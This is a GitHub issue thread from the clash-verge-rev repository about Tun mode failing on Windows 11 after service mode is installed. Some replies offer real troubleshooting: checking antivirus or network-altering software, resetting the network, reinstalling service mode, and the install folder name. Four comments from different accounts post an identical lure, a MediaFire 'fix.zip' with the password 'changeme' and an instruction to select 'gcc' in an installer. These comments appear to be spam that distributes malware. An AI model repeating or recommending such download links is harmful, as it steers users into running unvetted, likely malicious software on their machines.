### ISSUE TITLE
[BUG] Tun模式无法使用，服务模式已安装但无法启用

### ISSUE THREAD

**Issue by jc579** [clash-verge-rev/clash-verge-rev#1637]
### 问题描述 / Describe the bug

使用一段时间之后，Tun模式无法启用，重装之后解决了，但又使用了一段时间之后，再次无法使用，verge版本为最新的V1.7.7。
![image](https://github.com/user-attachments/assets/82a92aae-b94b-43a5-a796-9404d9dad297)
![image](https://github.com/user-attachments/assets/00422162-a228-4c7f-998f-cc5b7ac09cbe)

### 复现步骤 / To Reproduce

启用Tun模式，一段时间之后自动出现该问题

### 操作系统 / OS

Windows

### 操作系统版本 / OS Version

windows11 24H2

### 日志 / Log

暂无

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WaveListenToMe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WaveListenToMe** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by JackloveJam** [comment]
(非官方)个人用户角度分析

通过你的描述，我大概判断这并不是clash的问题。因为我最近几个版本用到现在最新的1.7.6 都开启了Tun模式。
完全没遇到这种类似 功能组件“自我回滚”事情。
--
那么不妨分析 **外在因素** 影响。
是否安装使用了**杀毒软件**或其他可能潜在**修改你网络设置的软件**。可以从这2大块 自己排查下。
>windows自带防火墙可以全部关闭

--
其次，还可以通过以下路径找到网络重置功能
 Win11  设置 网络和Internet  高级网络设置 网络重置
（请确认这样操作后对你的影响力度。如果你安装的有虚拟机等虚拟网卡工具软件并在使用， 那还是不要这样操作了）

**Comment by wonfen** [comment]
到软件安装目录卸载服务模式，然后再安装试试

**Comment by iStarCc** [comment]
是因为安装目录不是clash-verge，而变成了Clash Verge
